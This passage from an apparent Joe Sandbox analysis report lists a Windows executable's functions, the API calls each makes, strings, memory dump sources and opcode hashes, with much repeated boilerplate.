                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 7f52b074ab253e1f73398394dc61ad1436248e6ac990aab12966ad1c3102974d
                                                                  • Instruction ID: f2108c2059b8f3193b44fc8fd44861641384025186ed07a3445667fd18f2d8e8
                                                                  • Opcode Fuzzy Hash: 7f52b074ab253e1f73398394dc61ad1436248e6ac990aab12966ad1c3102974d
                                                                  • Instruction Fuzzy Hash: BDA011CA2A8002BC300832A32C02C3B028CC0C0B28330882FF80282080B8880C02283F
                                                                  Function 0046E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: e046a069e45f8743bae1b1ebfae5bda76e3f6cd71c28044da304f69877c7cd99
                                                                  • Instruction ID: f2108c2059b8f3193b44fc8fd44861641384025186ed07a3445667fd18f2d8e8
                                                                  • Opcode Fuzzy Hash: e046a069e45f8743bae1b1ebfae5bda76e3f6cd71c28044da304f69877c7cd99
                                                                  • Instruction Fuzzy Hash: BDA011CA2A8002BC300832A32C02C3B028CC0C0B28330882FF80282080B8880C02283F
                                                                  Function 00459F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetEndOfFile.KERNELBASE(?,0045903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00459F0C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File
                                                                  • String ID:
                                                                  • API String ID: 749574446-0
                                                                  • Opcode ID: c4ecaa52c975cfc8a54c1e73d463f7649c01c053c602c740ff3e56cd25fc5554
                                                                  • Instruction ID: fae9e59992012bd1e3157c0217bba03cb195d8f0dc72b608e364c2c637b6e569
                                                                  • Opcode Fuzzy Hash: c4ecaa52c975cfc8a54c1e73d463f7649c01c053c602c740ff3e56cd25fc5554
                                                                  • Instruction Fuzzy Hash: E5A0113008000A8A8E002B30CA0800C3B20EB22BC23200AA8A00ACA0A2CB22880B8B00
                                                                  Function 0046AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0046AE72,C:\Users\user\Desktop,00000000,0049946A,00000006), ref: 0046AC08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID:
                                                                  • API String ID: 1611563598-0
                                                                  • Opcode ID: 403474c87be70b052372f476d61f83d270f3d96c4f2440e23606ebc0691903af
                                                                  • Instruction ID: cafe43436a7ba297a1dcb48d1c4166692c2346c5430eeed1e4243619e0e39ee3
                                                                  • Opcode Fuzzy Hash: 403474c87be70b052372f476d61f83d270f3d96c4f2440e23606ebc0691903af
                                                                  • Instruction Fuzzy Hash: 84A011302002008B82000F328F0AA0FBAAAAFA2F02F00C838A08080030CB38C820AA08
                                                                  Function 00459620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,004595D6,?,?,?,?,?,00482641,000000FF), ref: 0045963B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: c209a59114debd135c9a83af260f577dc4cc99e48a64a442a5198d287792f714
                                                                  • Instruction ID: 46746000b7bfd35d07cf02d832550c9609d7cc56e523bc32ff1212c3bb493ab4
                                                                  • Opcode Fuzzy Hash: c209a59114debd135c9a83af260f577dc4cc99e48a64a442a5198d287792f714
                                                                  • Instruction Fuzzy Hash: 33F0E930081B15DFDB308A20C488B9377E86B12323F040B1FD8E643AE1D3696D8DCB44

                                                                  Non-executed Functions

                                                                  Function 0046C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0046C2B1
                                                                  • EndDialog.USER32(?,00000006), ref: 0046C2C4
                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0046C2E0
                                                                  • SetFocus.USER32(00000000), ref: 0046C2E7
                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0046C321
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0046C358
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046C36E
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C38C
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C39C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0046C3B8
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0046C3D4
                                                                  • _swprintf.LIBCMT ref: 0046C404
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0046C417
                                                                  • FindClose.KERNEL32(00000000), ref: 0046C41E
                                                                  • _swprintf.LIBCMT ref: 0046C477
                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0046C48A
                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0046C4A7
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0046C4C7
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C4D7
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0046C4F1
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0046C509
                                                                  • _swprintf.LIBCMT ref: 0046C535
                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0046C548
                                                                  • _swprintf.LIBCMT ref: 0046C59C
                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0046C5AF
                                                                    • Part of subcall function 0046AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0046AF35
                                                                    • Part of subcall function 0046AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0048E72C,?,?), ref: 0046AF84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                  • String ID: %s %s$%s %s %s$PF$REPLACEFILEDLG
                                                                  • API String ID: 797121971-1441439866
                                                                  • Opcode ID: 2df33c8dd315d4100952b283d8410bdaf8c48550b57989b29de1ba2eaee1e5ac
                                                                  • Instruction ID: a3c07281ea4a564e56426793584af8ac7027bd6027c80cf3e0b5e79d0e1ec6b1
                                                                  • Opcode Fuzzy Hash: 2df33c8dd315d4100952b283d8410bdaf8c48550b57989b29de1ba2eaee1e5ac
                                                                  • Instruction Fuzzy Hash: D891B772544344BBD2219FA5CC89FFB77ACEB45B05F00482AF685D6181E739A6048B6B
                                                                  Function 00456FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00456FAA
                                                                  • _wcslen.LIBCMT ref: 00457013
                                                                  • _wcslen.LIBCMT ref: 00457084
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                    • Part of subcall function 0045A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641,000000FF), ref: 0045A1F1
                                                                    • Part of subcall function 0045A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641), ref: 0045A21F
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00457139
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00457155
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00457298
                                                                    • Part of subcall function 00459DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004573BC,?,?,?,00000000), ref: 00459DBC
                                                                    • Part of subcall function 00459DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00459E70
                                                                    • Part of subcall function 00459620: CloseHandle.KERNELBASE(000000FF,?,?,004595D6,?,?,?,?,?,00482641,000000FF), ref: 0045963B
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3983180755-3508440684
                                                                  • Opcode ID: 9ea5ef673f2f60fef96af09ab1eea8f088986537ae1d1cb68c6ed3d1025cccd7
                                                                  • Instruction ID: 5890cc9bc8fcbf02f6aa799ca7babaa83018258ab778d1e34dec16ef4f77713a
                                                                  • Opcode Fuzzy Hash: 9ea5ef673f2f60fef96af09ab1eea8f088986537ae1d1cb68c6ed3d1025cccd7
                                                                  • Instruction Fuzzy Hash: 72C1E371904644AADB21DF75DC41BEFB3A8AF04705F00456FFD5AA3283D738AA48CB69
                                                                  Function 0047D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: 8d0a55ff3cd93ab85c7dd6a44df93d496d3611fe7dedf60330170aaf2df788bc
                                                                  • Instruction ID: e831df3166215195b4dfbe52bf45cafad8ff8dc4adff33c6bf1b71e8142b617e
                                                                  • Opcode Fuzzy Hash: 8d0a55ff3cd93ab85c7dd6a44df93d496d3611fe7dedf60330170aaf2df788bc
                                                                  • Instruction Fuzzy Hash: 2EC24D72E046288FDB25CE29DD407EAB7B5EB48304F1582EBD44DE7240E779AE818F45
                                                                  Function 004532F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog_swprintf
                                                                  • String ID: CMT$h%u$hc%u
                                                                  • API String ID: 146138363-3282847064
                                                                  • Opcode ID: 63cedf8118257fb7b9314f71aae6455a93f7c2a2d00f50118d2b34c168f9b7fa
                                                                  • Instruction ID: 9a0a1d3932c622d989dcda8f3c33d477e6dffe58b400b45eafadad44cdbbf447
                                                                  • Opcode Fuzzy Hash: 63cedf8118257fb7b9314f71aae6455a93f7c2a2d00f50118d2b34c168f9b7fa
                                                                  • Instruction Fuzzy Hash: 8732D271500384AFDB15DF74C895AEA37A5AF15346F04047FFD8A8B283DA78AA4DCB24
                                                                  Function 0045286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00452874
                                                                  • _strlen.LIBCMT ref: 00452E3F
                                                                    • Part of subcall function 004602BA: __EH_prolog.LIBCMT ref: 004602BF
                                                                    • Part of subcall function 00461B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0045BAE9,00000000,?,?,?,00010424), ref: 00461BA0
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00452F91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                  • String ID: CMT
                                                                  • API String ID: 1206968400-2756464174
                                                                  • Opcode ID: 83b3269b529b143345dc3c61215c5717196ec45fda04f2c14d14407da7d714f5
                                                                  • Instruction ID: c8b68036ed5eb9c834053e1c704020642402f5e6da1955a40dbfbb639f1bd9e7
                                                                  • Opcode Fuzzy Hash: 83b3269b529b143345dc3c61215c5717196ec45fda04f2c14d14407da7d714f5
                                                                  • Instruction Fuzzy Hash: 276204716003448FDB19DF34C9866EA37A1AF55305F08457FEC9A8B383DBB8A949CB64
                                                                  Function 0046F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0046F844
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0046F910
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046F930
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0046F93A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: e94708eed617247e014ca289a0b9b65c0022f7ac9b075295ce3e6b6789384d7a
                                                                  • Instruction ID: 2605258df5dbd633fe82e3c9b69721bdcdd5399a6c8d5f1b705ae0f071021ab9
                                                                  • Opcode Fuzzy Hash: e94708eed617247e014ca289a0b9b65c0022f7ac9b075295ce3e6b6789384d7a
                                                                  • Instruction Fuzzy Hash: BB312975D053199BDB20DFA4D9897CDBBB8AF08704F1040EAE44CAB250EB759B898F49
                                                                  Function 0046E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(80000000,0046E5E8,0000001C,0046E7DD,00000000,?,?,?,?,?,?,?,0046E5E8,00000004,004B1CEC,0046E86D), ref: 0046E6B4
                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0046E5E8,00000004,004B1CEC,0046E86D), ref: 0046E6CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: InfoQuerySystemVirtual
                                                                  • String ID: D
                                                                  • API String ID: 401686933-2746444292
                                                                  • Opcode ID: 0ab2f32134a8b55687a069679a0a2da00933ff9eed30c06b4a5429a532f49663
                                                                  • Instruction ID: ce2b70a2af90457693f1218ef0ef19c5bb369a6759ff76476ee566ccfdae302f
                                                                  • Opcode Fuzzy Hash: 0ab2f32134a8b55687a069679a0a2da00933ff9eed30c06b4a5429a532f49663
                                                                  • Instruction Fuzzy Hash: 08017B766001086BCF14DE6ACC08BDE3BEAEFC4725F0CC125ED19DB240E638D9018784
                                                                  Function 00478EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00478FB5
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00478FBF
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00478FCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: dc2b34963398c50fb992ae913d6649d86a47fff8febbe20e2c0f76c6f538d6ea
                                                                  • Instruction ID: 9d55819cafea4ec738eef727db724227181d8b93d4925d321bd7c2ef58f1997f
                                                                  • Opcode Fuzzy Hash: dc2b34963398c50fb992ae913d6649d86a47fff8febbe20e2c0f76c6f538d6ea
                                                                  • Instruction Fuzzy Hash: 2B31D274941228ABCB21DF65DC88BDDBBB8AF08710F5041EAE41CA7250EB749F858F49
                                                                  Function 0047B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
